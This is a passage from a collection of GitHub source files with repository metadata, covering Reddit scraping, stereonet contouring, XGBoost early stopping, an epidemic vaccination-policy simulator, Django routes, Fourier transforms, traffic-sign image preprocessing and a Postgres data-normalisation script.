len(parent_ids)):\n yield parent\n\n\n\ndef get_user_pushshift(user):\n api = PushshiftAPI()\n search_funcs = [api.search_submissions, api.search_comments]\n prefixes = ['t3_', 't1_']\n search_params = dict(author=user, )\n yield from scrape_pushshift(\n search_funcs=search_funcs,\n prefixes=prefixes,\n **search_params\n )\n\n\nif __name__ == '__main__':\n print(get_user_pushshift('hide_ous'))\n\n","repo_name":"hide-ous/fear","sub_path":"scrape_fear.py","file_name":"scrape_fear.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"28255527358","text":"\"\"\"\nReproduce Figure 5 from Vollmer, 1995 to illustrate different density contouring\nmethods.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport mplstereonet\n\nimport parse_angelier_data\n\ndef plot(ax, strike, dip, rake, **kwargs):\n ax.rake(strike, dip, rake, 'ko', markersize=2)\n ax.density_contour(strike, dip, rake, measurement='rakes', linewidths=1,\n cmap='jet', **kwargs)\n\n\n# Load data from Angelier, 1979\nstrike, dip, rake = parse_angelier_data.load()\n\n# Setup a subplot grid\nfig, axes = mplstereonet.subplots(nrows=3, ncols=4)\n\n# Hide azimuth tick labels\nfor ax in axes.flat:\n ax.set_azimuth_ticks([])\n\ncontours = [range(2, 18, 2), range(1, 21, 2), range(1, 22, 2)]\n\n# \"Standard\" Kamb contouring with different confidence levels.\nfor sigma, ax, contour in zip([3, 2, 1], axes[:, 0], contours):\n # We're reducing the gridsize to more closely match a traditional\n # hand-contouring grid, similar to Kamb's original work and Vollmer's\n # Figure 5. `gridsize=10` produces a 10x10 grid of density estimates.\n plot(ax, strike, dip, rake, method='kamb', sigma=sigma,\n levels=contour, gridsize=10)\n\n# Kamb contouring with inverse-linear smoothing (after Vollmer, 1995)\nfor sigma, ax, contour in zip([3, 2, 1], axes[:, 1], contours):\n plot(ax, strike, dip, rake, method='linear_kamb', sigma=sigma,\n levels=contour)\n template = r'$E={}\\sigma$ Contours: ${}\\sigma,{}\\sigma,\\ldots$'\n ax.set_xlabel(template.format(sigma, *contour[:2]))\n\n# Kamb contouring with exponential smoothing (after Vollmer, 1995)\nfor sigma, ax, contour in zip([3, 2, 1], axes[:, 2], contours):\n plot(ax, strike, dip, rake, method='exponential_kamb', sigma=sigma,\n levels=contour)\n\n# Title the different methods\nmethods = ['Kamb', 'Linear\\nSmoothing', 'Exponential\\nSmoothing']\nfor ax, title in zip(axes[0, :], methods):\n ax.set_title(title)\n\n# Hide top-right axis... (Need to implement Diggle & Fisher's method)\naxes[0, -1].set_visible(False)\n\n# Schmidt contouring (a.k.a. 1%)\nplot(axes[1, -1], strike, dip, rake, method='schmidt', gridsize=25,\n levels=range(3, 20, 3))\naxes[1, -1].set_title('Schmidt')\naxes[1, -1].set_xlabel(r'Contours: $3\\%,6\\%,\\ldots$')\n\n# Raw data.\naxes[-1, -1].set_azimuth_ticks([])\naxes[-1, -1].rake(strike, dip, rake, 'ko', markersize=2)\naxes[-1, -1].set_xlabel('N={}'.format(len(strike)))\n\nplt.show()\n","repo_name":"joferkington/mplstereonet","sub_path":"examples/contour_angelier_data.py","file_name":"contour_angelier_data.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"53"} +{"seq_id":"16542963281","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# 导入常用包\nimport xgboost as xgb\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.feature_selection import SelectFromModel\n\n\n# In[2]:\n\n\n# 数据集\ncancer = datasets.load_breast_cancer()\nX = cancer.data\nY = cancer.target\n\n\n# In[3]:\n\n\n# 数据集的情况\n# X.shape\n# Y.shape\n# X, Y\n\n\n# In[4]:\n\n\n# 拆分训练集、测试集\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 1/5., random_state = 8)\n\n\n# In[5]:\n\n\nxgb_train = xgb.DMatrix(X_train, label = Y_train)\nxgb_test = xgb.DMatrix(X_test, label = Y_test)\n\n\n# In[6]:\n\n\nparams = {\"objective\": \"binary:logistic\",\n \"booster\": \"gbtree\",\n \"eta\": 1,\n \"max_depth\": 2,\n \"eval_metric\": \"auc\"\n }\n\n\n# In[7]:\n\n\nwatchlist = [(xgb_train, 'train')]\n\n\n# In[8]:\n\n\n# 因为在第9轮(即编号为8)后4次中,auc一直没增加,所以停止迭代\n# 如果 watchlist 存在多个元组,则取最后一个元组的值\nbst = xgb.train(params, xgb_train, num_boost_round = 100, evals = watchlist, early_stopping_rounds = 4)\n\n\n# In[9]:\n\n\n# 使用前9棵树进行预测(前9棵数可以通过 bst.best_ntree_limit 来指定)\nY_test_pred = bst.predict(xgb_test, ntree_limit = 9)\nprint(roc_auc_score(Y_test, Y_test_pred))\n\n\n# In[10]:\n\n\nbst.best_score, bst.best_iteration, bst.best_ntree_limit\n\n\n# In[11]:\n\n\n# 共13棵树(编号0~12),bst是12棵树的模型,所以 bst.predict 方法时要使用 ntree_limit 来指定前9棵树\nxgb.to_graphviz(bst, fmap = '', num_trees = 12)\n\n","repo_name":"calxu/xgboost_learning","sub_path":"1_binary_classification/4_early_stopping_rounds/early_stopping_rounds.py","file_name":"early_stopping_rounds.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"6023080746","text":"import copy\nimport random\nfrom functools import partial\nfrom typing import Callable, Dict, List, Union, ValuesView\n\nfrom episimmer.agent import Agent\nfrom episimmer.location import Location\nfrom episimmer.model import BaseModel\n\nfrom .base import AgentPolicy\n\n\nclass VaccineResult():\n \"\"\"\n Stores the information regarding the result of a vaccination.\n\n Args:\n vaccine_name: Name of the vaccine used\n agent: Agent that was vaccinated\n result: Vaccination result (Successful or Unsuccessful)\n time_step: Time step when the vaccination was done\n efficacy: Efficacy of the vaccine administered to the agent\n decay_days: Number of days of protection offered by the vaccine\n current_dose: The dose of the vaccine administered to the agent\n \"\"\"\n def __init__(self, vaccine_name: str, agent: Agent, result: str,\n time_step: int, efficacy: float, decay_days: int,\n current_dose: int):\n self.vaccine_name: str = vaccine_name\n self.agent: Agent = agent\n self.result: str = result\n self.time_stamp: int = time_step\n self.efficacy: float = efficacy\n self.protection: int = decay_days\n self.current_dose: int = current_dose\n\n def __repr__(self) -> str:\n \"\"\"\n Shows the representation of the object as the string result\n\n Returns:\n The result of vaccination in string format\n \"\"\"\n return self.result\n\n\nclass VaccineType():\n \"\"\"\n Class for Vaccine.\n\n Args:\n name: Vaccine name\n cost: Cost of the vaccine\n decay: Number of days of protection offered by the vaccine, a list of each dose in case of multi-dose vaccine\n efficacy: Efficacy of the vaccine\n dosage: Number of doses of the vaccine, applies only for multi-dose vaccine\n interval: List specifying minimum days to pass before the administration of the next dose, for each dose of a\n multi-dose vaccine\n \"\"\"\n def __init__(self,\n name: str,\n cost: int,\n decay: Union[List[int], int],\n efficacy: float,\n dosage: Union[int, None] = None,\n interval: Union[List[int], None] = None):\n\n self.vaccine_name: str = name\n self.vaccine_cost: int = cost\n self.decay_days: Union[List[int], int] = decay\n self.efficacy: float = efficacy\n self.dosage: Union[int, None] = dosage\n self.interval: Union[List[int], None] = interval\n\n def vaccinate(self,\n agent: Agent,\n time_step: int,\n dose: int = 1) -> VaccineResult:\n \"\"\"\n Administers the specified dose of the current vaccine to the agent.\n Updates the protection days according to the dose administered.\n\n Args:\n agent: Agent to vaccinate\n time_step: Time step when the vaccination is performed\n dose: The dose of the vaccine to be administered to the agent\n\n Returns:\n Result object of vaccination\n \"\"\"\n result = agent.get_policy_history(\n 'Vaccination')[-1].result if dose > 1 else self.inject_vaccine()\n if result == 'Successful':\n decay_days = self.decay_days[dose -\n 1] if self.dosage else self.decay_days\n else:\n decay_days = 0\n result_obj = VaccineResult(self.vaccine_name, agent, result, time_step,\n self.efficacy, decay_days, dose)\n\n return result_obj\n\n def inject_vaccine(self) -> str:\n \"\"\"\n Injects an agent with the vaccine and returns the result based on vaccine's efficacy.\n\n Returns:\n Result of vaccination (Successful or Unsuccessful)\n \"\"\"\n if random.random() < self.efficacy:\n return 'Successful'\n else:\n return 'Unsuccessful'\n\n\nclass VaccinationPolicy(AgentPolicy):\n \"\"\"\n Class for implementing the vaccination policy.\n Inherits :class:`~episimmer.policy.base.AgentPolicy` class.\n\n An example of a GeneratePolicy.py file illustrating single dose and multi dose vaccination is given below.\n\n .. code-block:: python\n :linenos:\n\n from episimmer.policy import vaccination_policy\n\n def generate_policy():\n policy_list=[]\n\n # Single Dose Vaccination\n vp1= vaccination_policy.VaccinationPolicy(lambda x: 100)\n vaccines1 = {\n 'cov_single_dose': {'cost': 40, 'count': 20, 'efficacy': 0.9, 'decay': 40},\n 'cov_single_dose2': {'cost': 50, 'count': 15, 'efficacy': 0.5, 'decay': 30},\n }\n vp1.add_vaccines(vaccines1, 'Single')\n vp1.set_register_agent_vaccine_func(vp1.random_vaccination())\n policy_list.append(vp1)\n\n # Multi Dose Vaccination\n vp2= vaccination_policy.VaccinationPolicy(lambda x: 100)\n vaccines2 = {\n 'cov_multi_dose': {'cost': 40, 'count': 25, 'efficacy': 0.4, 'decay': [15, 14, 8], 'dose': 3, 'interval': [3, 2]},\n 'cov_multi_dose2': {'cost': 30, 'count': 40, 'efficacy': 0.7, 'decay': [20, 25, 17, 5], 'dose': 4, 'interval': [12, 26, 14]},\n 'cov_multi_dose3': {'cost': 30, 'count': 15, 'efficacy': 0.7, 'decay': [8], 'dose': 1, 'interval': []}\n }\n vp2.add_vaccines(vaccines2, 'Multi')\n vp2.set_register_agent_vaccine_func(vp2.multi_dose_vaccination())\n policy_list.append(vp2)\n\n return policy_list\n\n Args:\n agents_per_step_fn: User-defined function to specify the number of agents to vaccinate per time step\n \"\"\"\n def __init__(self, agents_per_step_fn: Callable):\n super().__init__('Vaccination')\n\n self.num_agents_to_vaccinate: int = 0\n self.results: List[VaccineResult] = []\n self.available_vaccines: Dict[str, Dict[str,\n Union[int, float, List[int],\n str]]] = {}\n self.vaccines: List[VaccineType] = []\n self.statistics: Dict[str, Dict[str, List[int]]] = {}\n self.statistics_total: Dict[str, List[int]] = {\n 'Total Vaccination': [],\n 'Total Successful': [],\n 'Total Unsuccessful': []\n }\n self.registered_agent_vaccine_func: Union[Callable, None] = None\n assert callable(agents_per_step_fn)\n self.agents_per_step_fn: Callable = agents_per_step_fn\n\n def enact_policy(self,\n time_step: int,\n agents: Dict[str, Agent],\n locations: ValuesView[Location],\n model: Union[BaseModel, None] = None,\n policy_index: int = None) -> None:\n \"\"\"\n Executes vaccination policy for the given time step.\n\n Args:\n time_step: Time step in which the policy is enacted\n agents: Dictionary mapping from agent indices to :class:`~episimmer.agent.Agent` objects\n locations: Collection of :class:`~episimmer.location.Location` objects\n model: Disease model specified by the user\n policy_index: Policy index passed to differentiate policies.\n \"\"\"\n self.new_time_step(time_step)\n self.set_protection(agents.values())\n self.registered_agent_vaccine_func(agents.values(), time_step)\n self.populate_results()\n self.restrict_agents(agents.values())\n self.get_stats()\n\n def new_time_step(self, time_step: int) -> None:\n \"\"\"\n Creates a list in which vaccine objects are added according to the user’s specification.\n Resets the results of the policy enacted in previous time step and the number of agents to vaccinate in the\n current time step.\n\n Args:\n time_step: Current time step\n \"\"\"\n self.vaccines = []\n self.results = []\n self.num_agents_to_vaccinate = self.agents_per_step_fn(time_step)\n\n for name, vaccine in self.available_vaccines.items():\n for i in range(int(vaccine['count'])):\n vaccine_obj = VaccineType(name, vaccine['cost'],\n vaccine['decay'],\n vaccine['efficacy'],\n vaccine.get('dose', 0),\n vaccine.get('interval', []))\n self.vaccines.append(vaccine_obj)\n\n def add_vaccines(self,\n vaccines: Dict[str, Dict[str, Union[int, float, List[int],\n str]]],\n dosage: str = 'Single') -> None:\n \"\"\"\n This function enables the user to add vaccines.\n\n Parameters to be specified for single dose vaccines in the vaccines dict:\n\n * cost: Cost of vaccine.\n * count: Number of vaccine available.\n * efficacy: Vaccine efficacy.\n * decay: Number of days of protection offered by the vaccine.\n\n .. code-block:: python\n :linenos:\n\n vp1= vaccination_policy.VaccinationPolicy(lambda x: 100)\n vaccines1 = {\n 'cov_single_dose': {'cost': 40, 'count': 20, 'efficacy': 0.9, 'decay': 40},\n 'cov_single_dose2': {'cost': 50, 'count': 15, 'efficacy': 0.5, 'decay': 30},\n }\n vp1.add_vaccines(vaccines1, 'Single')\n\n Parameters to be specified for multi dose vaccines in the vaccines dict:\n\n * cost: Cost of vaccine.\n * count: Number of vaccine available.\n * efficacy: Vaccine efficacy.\n * decay: A list of number of days of protection offered by each dose of the vaccine.\n * dose: Number of doses of the vaccine.\n * interval: A list specifying minimum days to pass before the administration of the next dose for each dose.\n\n\n .. code-block:: python\n :linenos:\n\n vp2= vaccination_policy.VaccinationPolicy(lambda x: 100)\n vaccines2 = {\n 'cov_multi_dose': {'cost': 40, 'count': 25, 'efficacy': 0.4, 'decay': [15, 14, 8], 'dose': 3, 'interval': [3, 2]},\n 'cov_multi_dose2': {'cost': 30, 'count': 40, 'efficacy': 0.7, 'decay': [20, 25, 17, 5], 'dose': 4, 'interval': [12, 26, 14]},\n 'cov_multi_dose3': {'cost': 30, 'count': 15, 'efficacy': 0.7, 'decay': [8], 'dose': 1, 'interval': []}\n }\n vp2.add_vaccines(vaccines2, 'Multi')\n\n Args:\n vaccines: A dictionary mapping vaccine names to its parameters\n dosage: Specifies if the vaccines are either ``Single`` dose or ``Multi`` dose\n \"\"\"\n if dosage == 'Single':\n for name, vaccine in vaccines.items():\n if not isinstance(vaccine['decay'], int):\n raise TypeError('Vaccine decay must be a type integer')\n self.available_vaccines[name] = vaccine\n self.available_vaccines[name]['type'] = dosage\n self.statistics[name] = {\n 'Total Vaccination': [],\n 'Total Successful': [],\n 'Total Unsuccessful': []\n }\n elif dosage == 'Multi':\n for name, vaccine in vaccines.items():\n if not isinstance(vaccine['decay'], list):\n raise TypeError('Vaccine decay must be a list')\n if vaccine.get('dose') is None:\n raise Exception('Dose parameter missing')\n\n if vaccine.get('interval') is None:\n raise Exception('Interval parameter missing')\n\n if not isinstance(vaccine['interval'], list):\n raise TypeError('Interval must be a list')\n if len(vaccine['decay']) != vaccine['dose']:\n raise ValueError(\n 'Vaccine decay must be a list of length equal to the count of vaccine dosage'\n )\n if len(vaccine['interval']) != vaccine['dose'] - 1:\n raise ValueError(\n 'Vaccine interval must be a list of length one less than the count of vaccine dosage'\n )\n self.available_vaccines[name] = vaccine\n self.available_vaccines[name]['type'] = dosage\n self.statistics[name] = {\n 'Total Vaccination': [],\n 'Total Successful': [],\n 'Total Unsuccessful': []\n }\n\n def set_register_agent_vaccine_func(self, func: Callable) -> None:\n \"\"\"\n Registers the function that determines the type of vaccination to be performed.\n The user must specify one of the following functions\n\n * :meth:`~random_vaccination`\n * :meth:`~multi_dose_vaccination`\n\n .. code-block:: python\n :linenos:\n\n vp1.set_register_agent_vaccine_func(vp1.random_vaccination())\n vp2.set_register_agent_vaccine_func(vp2.multi_dose_vaccination())\n\n Args:\n func: Function that determines the type of vaccination to be performed\n \"\"\"\n self.registered_agent_vaccine_func = func\n\n def full_random_vaccination(self, attribute: Union[str, None],\n value_list: List[str],\n agents: ValuesView[Agent],\n time_step: int) -> None:\n \"\"\"\n If the number of agents vaccinated is less than the maximum number of agents to vaccinate per time step,\n for every unvaccinated agent this function randomly chooses a vaccine from the list of vaccines and performs\n vaccination on the agent. This function is valid only for single dose vaccines.\n\n Args:\n agents: Collection of :class:`~episimmer.agent.Agent` objects\n time_step: Current time step\n attribute: Attribute name of agents\n value_list: List of attribute values of agents\n \"\"\"\n agents_copy = copy.copy(list(agents))\n random.shuffle(agents_copy)\n curr_agents_to_vaccinate = self.num_agents_to_vaccinate\n\n for agent in agents_copy:\n if curr_agents_to_vaccinate <= 0:\n break\n\n if attribute is None or agent.info[attribute] in value_list:\n if agent.get_policy_state(\n 'Vaccination') is None and self.vaccines:\n current_vaccine = random.choice(self.vaccines)\n result = current_vaccine.vaccinate(agent, time_step)\n self.results.append(result)\n self.vaccines.remove(current_vaccine)\n curr_agents_to_vaccinate -= 1\n\n def random_vaccination(self,\n attribute: Union[str, None] = None,\n value_list: List[str] = []) -> Callable:\n \"\"\"\n This function can be used by the user in ``Generate_policy.py`` to specify randomized vaccination to be\n performed for the agents. This function returns a partial function of :meth:`~full_random_vaccination`.\n\n An example of a GeneratePolicy.py file illustrating single dose vaccination is given below.\n\n .. code-block:: python\n :linenos:\n :emphasize-lines: 12\n\n from episimmer.policy import vaccination_policy\n\n def generate_policy():\n policy_list=[]\n\n vp1= vaccination_policy.VaccinationPolicy(lambda x: 100)\n vaccines1 = {\n 'cov_single_dose': {'cost': 40, 'count': 20, 'efficacy': 0.9, 'decay': 40},\n 'cov_single_dose2': {'cost': 50, 'count': 15, 'efficacy': 0.5, 'decay': 30},\n }\n vp1.add_vaccines(vaccines1, 'Single')\n vp1.set_register_agent_vaccine_func(vp1.random_vaccination())\n policy_list.append(vp1)\n\n return policy_list\n\n Args:\n attribute: Attribute name of agents\n value_list: List of attribute values of agents\n\n Returns:\n Partial function of :meth:`~full_random_vaccination`\n \"\"\"\n assert isinstance(value_list, list)\n return partial(self.full_random_vaccination, attribute, value_list)\n\n def full_multi_dose_vaccination(self, attribute: Union[str, None],\n value_list: List[str],\n agents: ValuesView[Agent],\n time_step: int) -> None:\n \"\"\"\n If the number of agents vaccinated is less than the maximum number of agents to vaccinate per time step,\n for every unvaccinated agent this function randomly chooses a vaccine from the list of vaccines and performs\n vaccination on the agent, and for every vaccinated agent if it is time for next dose, the next dose of the same\n vaccine is vaccinated for the agent.\n This function is valid only for multi dose vaccines.\n\n Args:\n agents: Collection of :class:`~episimmer.agent.Agent` objects\n time_step: Current time step\n attribute: Attribute name of agents\n value_list: List of attribute values of agents\n \"\"\"\n agents_copy = copy.copy(list(agents))\n random.shuffle(agents_copy)\n curr_agents_to_vaccinate = self.num_agents_to_vaccinate\n\n for agent in agents_copy:\n if curr_agents_to_vaccinate <= 0:\n break\n\n if attribute is None or agent.info[attribute] in value_list:\n history = self.get_agent_policy_history(agent)\n lh = history[-1] if history else None\n\n if agent.get_policy_state(\n 'Vaccination') is None and self.vaccines:\n current_vaccine = random.choice(self.vaccines)\n result = current_vaccine.vaccinate(agent, time_step)\n self.results.append(result)\n self.vaccines.remove(current_vaccine)\n curr_agents_to_vaccinate -= 1\n\n elif (lh is not None\n and lh.vaccine_name in self.available_vaccines\n and self.available_vaccines[lh.vaccine_name]['type']\n == 'Multi'):\n if (lh.current_dose <\n self.available_vaccines[lh.vaccine_name]['dose']\n and time_step - lh.time_stamp >=\n self.available_vaccines[lh.vaccine_name]\n ['interval'][lh.current_dose - 1]):\n current_vaccine = None\n for vaccine in self.vaccines:\n if vaccine.vaccine_name == lh.vaccine_name:\n current_vaccine = vaccine\n break\n if current_vaccine is not None:\n result = current_vaccine.vaccinate(\n agent, time_step, lh.current_dose + 1)\n self.results.append(result)\n self.vaccines.remove(current_vaccine)\n curr_agents_to_vaccinate -= 1\n\n def multi_dose_vaccination(self,\n attribute: Union[str, None] = None,\n value_list: List[str] = []) -> Callable:\n \"\"\"\n This function can be used by the user in ``Generate_policy.py`` to specify multi-dose vaccination to be\n performed for the agents. This function returns a partial function of :meth:`~full_multi_dose_vaccination`.\n\n An example of a GeneratePolicy.py file illustrating multi dose vaccination is given below.\n\n .. code-block:: python\n :linenos:\n :emphasize-lines: 13\n\n from episimmer.policy import vaccination_policy\n\n def generate_policy():\n policy_list=[]\n\n vp2= vaccination_policy.VaccinationPolicy(lambda x: 100)\n vaccines2 = {\n 'cov_multi_dose': {'cost': 40, 'count': 25, 'efficacy': 0.4, 'decay': [15, 14, 8], 'dose': 3, 'interval': [3, 2]},\n 'cov_multi_dose2': {'cost': 30, 'count': 40, 'efficacy': 0.7, 'decay': [20, 25, 17, 5], 'dose': 4, 'interval': [12, 26, 14]},\n 'cov_multi_dose3': {'cost': 30, 'count': 15, 'efficacy': 0.7, 'decay': [8], 'dose': 1, 'interval': []}\n }\n vp2.add_vaccines(vaccines2, 'Multi')\n vp2.set_register_agent_vaccine_func(vp2.multi_dose_vaccination())\n policy_list.append(vp2)\n\n return policy_list\n\n Args:\n attribute: Attribute name of agents\n value_list: List of attribute values of agents\n\n Returns:\n Partial function of :meth:`~full_multi_dose_vaccination`\n \"\"\"\n return partial(self.full_multi_dose_vaccination, attribute, value_list)\n\n def set_protection(self, agents: ValuesView[Agent]) -> None:\n \"\"\"\n For every vaccinated agent the protection days offered by the vaccine in agent history is decremented by 1.\n\n Args:\n agents: Collection of :class:`~episimmer.agent.Agent` objects\n \"\"\"\n for agent in agents:\n history = self.get_agent_policy_history(agent)\n # dict of result objects\n if len(history\n ) == 0 or history[-1].result == 'Unsuccessful' or history[\n -1].protection == 0:\n continue\n else:\n history[-1].protection -= 1\n\n def populate_results(self) -> None:\n \"\"\"\n Updates agent policy history and state from the list of results.\n \"\"\"\n for result_obj in self.results:\n agent = result_obj.agent\n self.update_agent_policy_history(agent, result_obj)\n self.update_agent_policy_state(agent, result_obj.result)\n\n def restrict_agents(self, agents: ValuesView[Agent]) -> None:\n \"\"\"\n Restricts the ability of a vaccinated agent to receive an infection.\n\n Args:\n agents: Collection of :class:`~episimmer.agent.Agent` objects\n \"\"\"\n for agent in agents:\n history = self.get_agent_policy_history(agent)\n if len(history) != 0:\n if history[-1].result == 'Successful':\n if history[-1].protection >= 1:\n agent.protect()\n\n def get_stats(self) -> None:\n \"\"\"\n Calculates the overall statistics of the vaccines administered.\n \"\"\"\n self.statistics_total['Total Vaccination'].append(0)\n self.statistics_total['Total Successful'].append(0)\n self.statistics_total['Total Unsuccessful'].append(0)\n for name in self.available_vaccines.keys():\n self.statistics[name]['Total Vaccination'].append(0)\n self.statistics[name]['Total Successful'].append(0)\n self.statistics[name]['Total Unsuccessful'].append(0)\n\n for result_obj in self.results:\n self.statistics_total['Total Vaccination'][-1] += 1\n name = result_obj.vaccine_name\n self.statistics[name]['Total Vaccination'][-1] += 1\n result = result_obj.result\n if result == 'Successful':\n self.statistics[name]['Total Successful'][-1] += 1\n self.statistics_total['Total Successful'][-1] += 1\n elif result == 'Unsuccessful':\n self.statistics[name]['Total Unsuccessful'][-1] += 1\n self.statistics_total['Total Unsuccessful'][-1] += 1\n","repo_name":"healthbadge/episimmer","sub_path":"episimmer/policy/vaccination_policy.py","file_name":"vaccination_policy.py","file_ext":"py","file_size_in_byte":24187,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"36016155727","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.intro, name=\"intro\"),\n path('store/', views.store, name=\"store\"),\n\n path('store//', views.PostDetailView.as_view(), name='product'),\n\n path('basket/', views.basket, name=\"basket\"),\n path('checkout/', views.checkout, name=\"checkout\"),\n\n path('update_item/', views.updateItem, name=\"update_item\"),\n\n path('view_info/', views.view_info, name=\"view_info\")\n\n]\n","repo_name":"Raretears1/book_shop","sub_path":"shop/store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8114450842","text":"import numpy as np\nimport cv2\nfrom assignment_3_qn_1 import DFT_2D_FROM_1D\n\nclass IDFT_2D_FROM_1D:\n def __init__(self):\n print(\"[Class Info] IDFT_2D_FROM_1D class info\")\n def idft_2d(self, dft_2d, filter_size):\n \"\"\"\n\n :param dft_2d:\n :return:\n \"\"\"\n inverse_transform = np.empty((filter_size, filter_size), dtype=np.complex128)\n for row in range(filter_size):\n inverse_transform[row, 0:filter_size] = np.fft.ifft(np.fft.fftshift(dft_2d[row, 0:filter_size]))\n final_inverse_transform = np.empty(dft_2d.shape, dtype=np.complex128)\n for col in range(filter_size):\n final_inverse_transform[0:filter_size, col] = np.fft.ifft(np.fft.fftshift(inverse_transform[0:filter_size, col]))\n # np.fft.ifft2(dft_2d)\n return final_inverse_transform\n\n\n","repo_name":"vikash0837/Digital-Image-Processing","sub_path":"assignment3/assignment_3_qn_2.py","file_name":"assignment_3_qn_2.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24303704743","text":"#\t\t\t\t\t\tram\tdisco\r\nlugar = Field(\"lugar\")\r\nip = Field(\"ip\",requires = IS_IPV4(),default=\"0.0.0.0\")\r\nmascara_subred = Field(\"mascara_subred\",requires = IS_IPV4(),default=\"0.0.0.0\")\r\npuerta_enlace = Field(\"puerta_enlace\",requires = IS_IPV4(),default=\"0.0.0.0\")\r\ncod_seguridad = Field(\"cod_seguridad\")\r\nprocesador = Field(\"procesador\")\r\nram = Field(\"ram\")\r\ndisco = Field(\"disco\")\r\nno_inventario = Field(\"no_inventario\")\r\nmac_address = Field(\"mac_address\")\r\ndb.define_table(\"config_nautas\",lugar,ip,mascara_subred,puerta_enlace,cod_seguridad,procesador,ram,disco,no_inventario,mac_address)\r\ndb.config_nautas.id.readable = 0\r\n#Servicio\t\tTipo de servicio\t\t\t\tSector\t\t\t\t\t\t\tNo de Traza\tSoporte\t\tRuta\t\t\tTerminal\tDirección del Terminal\tCircuito de Linea\tSitio\tCentral Digital\r\n","repo_name":"geordanisb/sisgiem","sub_path":"applications/ti/models/nautas.py","file_name":"nautas.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29055791529","text":"# Script to make hdf5 files from training and test set\nimport numpy as np\nfrom skimage import io, color, exposure, transform\nimport pandas as pd\nimport os\nimport glob\nimport h5py\n\nNUM_CLASSES = 43\nIMG_SIZE = 48\n\n\ndef preprocess_img(img):\n # Histogram normalization in y\n hsv = color.rgb2hsv(img)\n hsv[:, :, 2] = exposure.equalize_hist(hsv[:, :, 2])\n img = color.hsv2rgb(hsv)\n\n # central scrop\n min_side = min(img.shape[:-1])\n centre = img.shape[0] // 2, img.shape[1] // 2\n img = img[centre[0] - min_side // 2:centre[0] + min_side // 2,\n centre[1] - min_side // 2:centre[1] + min_side // 2,\n :]\n\n # rescale to standard size\n img = transform.resize(img, (IMG_SIZE, IMG_SIZE))\n\n # roll color axis to axis 0\n img = np.rollaxis(img, -1)\n\n return img\n\n\ndef get_class(img_path):\n return int(img_path.split(r'\\\\'[:-1])[-2])\n\n\nif __name__ == '__main__':\n root_dir = r'GTSRB\\Final_Training\\Images\\\\'[:-1]\n imgs = []\n labels = []\n\n all_img_paths = glob.glob(os.path.join(root_dir, '*\\*.ppm'))\n np.random.shuffle(all_img_paths)\n for img_path in all_img_paths:\n try:\n img = preprocess_img(io.imread(img_path))\n label = get_class(img_path)\n imgs.append(img)\n labels.append(label)\n\n if len(imgs) % 1000 == 0: print(\"Processed {}/{}\".format(len(imgs), len(all_img_paths)))\n except (IOError, OSError):\n print('missed', img_path)\n pass\n\n X = np.array(imgs, dtype='float32')\n Y = np.array(labels, dtype='uint8')\n\n with h5py.File(r'D:\\X3.h5', 'w') as hf:\n hf.create_dataset('imgs', data=X)\n hf.create_dataset('labels', data=Y)\n\n","repo_name":"ibabaev/DeepLearningCourse","sub_path":"tests/preprocess_data_images.py","file_name":"preprocess_data_images.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73756875047","text":"\"\"\"\n ____ ___ \n ____/ / /_ ____ ____ _________ ___ ____ _/ (_)___ ___ _____\n / __ / __ \\/ __ \\/ __ \\/ ___/ __ `__ \\/ __ `/ / /_ / / _ \\/ ___/\n/ /_/ / /_/ / / / / /_/ / / / / / / / / /_/ / / / / /_/ __/ / \n\\__,_/_.___/_/ /_/\\____/_/ /_/ /_/ /_/\\__,_/_/_/ /___/\\___/_/ \n \nMake normalizations about data.\n\"\"\"\nimport asyncpg, asyncio, click, copy\nfrom tqdm import tqdm\nfrom pprint import pprint\n\nconnection_options = {\n \"user\":\"enem\",\n \"password\":\"catapimbas\",\n \"port\":5432,\n \"max_size\":20,\n \"min_size\":20,\n}\nasync def get_connection_pool(**options):\n return await asyncpg.create_pool(**options)\ndef gcs(cmd):\n for line in cmd.split(\"\\n\"):\n if line.startswith(\"INSERT\"):\n return line.split(\"(\")[0]\n return None\nget_commands = lambda sql_script: [\n (\n \"TRUNCATE\" if \"TRUNCATE\" in command else gcs(command),\n command,\n )\n for command in map(lambda x: x + \";\", sql_script.split(\";\"))\n]\n\ndef show(cmds):\n click.clear()\n print(\"Remains: \")\n pprint([c[0] for c in cmds[\"remains\"]])\n print(\"Processing: \")\n pprint([c[0] for c in cmds[\"processing\"]])\n print(\"Finished: \")\n pprint([c[0] for c in cmds[\"finished\"]])\n\nasync def main():\n # Open fill production schema file \n with open(\"../schemas/fill_production_schema.sql\") as f:\n cmds = {\n \"remains\": get_commands(f.read()),\n \"processing\": [],\n \"finished\": [],\n }\n\n pool = await get_connection_pool(**connection_options)\n pprint(cmds)\n async with pool.acquire() as conn:\n for item in copy.deepcopy(cmds[\"remains\"]):\n\n # Move cmd to processing\n cmds[\"remains\"].remove(item)\n cmds[\"processing\"].append(item)\n show(cmds)\n # Process cmd\n if item[1]:\n await conn.execute(item[1])\n # Process \n cmds[\"processing\"].remove(item)\n cmds[\"finished\"].append(item)\n 